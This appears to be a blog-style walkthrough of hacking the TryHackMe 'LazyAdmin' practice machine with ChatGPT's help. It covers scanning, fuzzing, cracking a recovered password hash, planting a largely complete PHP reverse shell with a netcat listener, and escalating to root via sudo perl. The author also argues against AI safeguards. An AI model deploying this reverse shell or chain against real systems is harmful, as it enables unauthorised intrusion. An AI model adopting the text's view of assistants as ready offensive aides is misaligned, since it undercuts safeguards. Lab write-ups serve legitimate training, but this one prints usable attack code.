Professional Documents
Culture Documents
Beginners Guide To AI in Cybersec. Hacking With ChatGPT.
Beginners Guide To AI in Cybersec. Hacking With ChatGPT.
Hacking with
ChatGPT.
AI which stands for Artificial Intelligence has come a long way, since the era of the World Wide Web.
Today, we can see the integration of Artificial Intelligence into almost every technology. Whether it’s
your Google Assistant in the Androids, Alexa in Amazon Devices, or Siri in Apple Devices. There are
many other AI available on our day-to-day browsers. One of the major industries in AI is OpenAI,
which rolled out ChatGPT based on the latest GPT3.
OpenAI
OpenAI is an AI research and deployment company. Our mission is to ensure that
artificial general intelligence benefits…
openai.com
TryHackMe | LazyAdmin
Easy linux machine to practice your skills
tryhackme.com
Since, I am assuming that I know only basics of hacking, let’s ask ChatGPT how to get started and
what should be our first step.
It suggests, we should gather information about our target and find it’s vulnerabilities by performing a
network scan, so let’s do that. It even suggests the name of tool that we should use called nmap. Now,
we should also ask ChatGPT for our Nmap scan syntax that we will perform in our Linux terminal.
Here is the IP address of the target, we are trying to hack into.
I modified the syntax a little bit only to make it go faster! HERE IS THE RESULT OF THE SCAN:
Port 22 and 80 are open so let’s go to the port 80 webserver.
It seems that Apache2 is running on port 80.
No worries let’s ask ChatGPT for assistance. Since, it’s a web-server, I am gonna ask for fuzzing this
website to discover the secrets.
There we go, let’s do this! Looks like we got something already.
This is the site, that we got.
/content (Status: 301) [Size: 316] [--> http://10.10.117.255/content/]
I looked for My SQL backup directory and go this .SQL file, inside I found the password hash.
Now, let’s ask ChatGPT, about what should we do with the password hash.
Let’s do what it says. Let’s perform a hash cracking online using a platform called CrackStation. Here
is the link:
CrackStation - Online Password Hash Cracking - MD5, SHA1,
Linux, Rainbow Tables, etc.
Enter up to 20 non-salted hashes, one per line: Supports: LM, NTLM, md2, md4,
md5, md5(md5_hex), md5-half, sha1…
crackstation.net
if ($pid == -1) {
printit("ERROR: Can't fork");
exit(1);
}
if ($pid) {
exit(0); // Parent exits
}
// Make the current process a session leader
// Will only succeed if we forked
if (posix_setsid() == -1) {
printit("Error: Can't setsid()");
exit(1);
}
$daemon = 1;
} else {
printit("WARNING: Failed to daemonise. This is quite common and not fatal.");
}
// Change to a safe directory
chdir("/");
// Remove any umask we inherited
umask(0);
//
// Do the reverse shell...
//
// Open reverse connection
$sock = fsockopen($ip, $port, $errno, $errstr, 30);
if (!$sock) {
printit("$errstr ($errno)");
exit(1);
}
// Spawn shell process
$descriptorspec = array(
0 => array("pipe", "r"), // stdin is a pipe that the child will read from
1 => array("pipe", "w"), // stdout is a pipe that the child will write to
2 => array("pipe", "w") // stderr is a pipe that the child will write to
);
$process = proc_open($shell, $descriptorspec, $pipes);
if (!is_resource($process)) {
printit("ERROR: Can't spawn shell");
exit(1);
}
// Set everything to non-blocking
// Reason: Occsionally reads will block, even though stream_select tells us they
won't
stream_set_blocking($pipes[0], 0);
stream_set_blocking($pipes[1], 0);
stream_set_blocking($pipes[2], 0);
stream_set_blocking($sock, 0);
printit("Successfully opened reverse shell to $ip:$port");
while (1) {
// Check for end of TCP connection
if (feof($sock)) {
printit("ERROR: Shell connection terminated");
break;
}
// Check for end of STDOUT
if (feof($pipes[1])) {
printit("ERROR: Shell process terminated");
break;
}
// Wait until a command is end down $sock, or some
// command output is available on STDOUT or STDERR
$read_a = array($sock, $pipes[1], $pipes[2]);
$num_changed_sockets = stream_select($read_a, $write_a, $error_a, null);
// If we can read from the TCP socket, send
// data to process's STDIN
if (in_array($sock, $read_a)) {
if ($debug) printit("SOCK READ");
$input = fread($sock, $chunk_size);
if ($debug) printit("SOCK: $input");
fwrite($pipes[0], $input);
}
// If we can read from the process's STDOUT
// send data down tcp connection
if (in_array($pipes[1], $read_a)) {
if ($debug) printit("STDOUT READ");
$input = fread($pipes[1], $chunk_size);
if ($debug) printit("STDOUT: $input");
fwrite($sock, $input);
}
// If we can read from the process's STDERR
// send data down tcp connection
if (in_array($pipes[2], $read_a)) {
if ($debug) printit("STDERR READ");
$input = fread($pipes[2], $chunk_size);
if ($debug) printit("STDERR: $input");
fwrite($sock, $input);
}
}
fclose($sock);
fclose($pipes[0]);
fclose($pipes[1]);
fclose($pipes[2]);
proc_close($process);
// Like print, but does nothing if we've daemonised ourself
// (I can't figure out how to redirect STDOUT like a proper daemon)
function printit ($string) {
if (!$daemon) {
print "$string
";
}
}
?>
Let’s copy and paste this onto Ads section and create a file. Don’t forget to change the IP and port. Set
your tun0 IP and change the Port to 9001.
Now we have to create a listener in our device, where we can receive the connection back.
nc -lvnp 9001
As soon as you click on revshell.php on the webserver, a connection will be established here! Boom, I
got the shell!
Copy paste this here and half of this machine will be considered hacked.
Next, we need to do privilege escalation and get the root flag. Enter the following command, and we
will get the root access.
python3 -c 'import pty;pty.spawn("/bin/bash")'
And, then at last, the final command, execute this and you will get the root terminal.
sudo perl /home/itguy/backup.pl
Copy paste the flag and boom! The machine is successfully hacked!
This is going to be one of the first article, that has covered how to hack a machine using ChatGPT. I
would do some more articles on ChatGPT and other AI programs in the near future. It is quite
clear that the modern advancements in AI has a lot of perks, but it can also be used for malicious
activity. Programmers and developers are censoring these programs to stop these malicious activities.
Censorship in AI programs.
As for my personal opinion, I don’t support censoring of the internet or any technology for that
matter. Censoring technology has never brought down the criminal activities, and I don’t think it ever
will. Advancement in tech is inevitable. You can’t stop or manipulate it.
Here is a poem, that I asked ChatGPT to write for me on “Darkness in hackers”. Hope you’ll like
it.
Be safe, be secure and happy hacking :)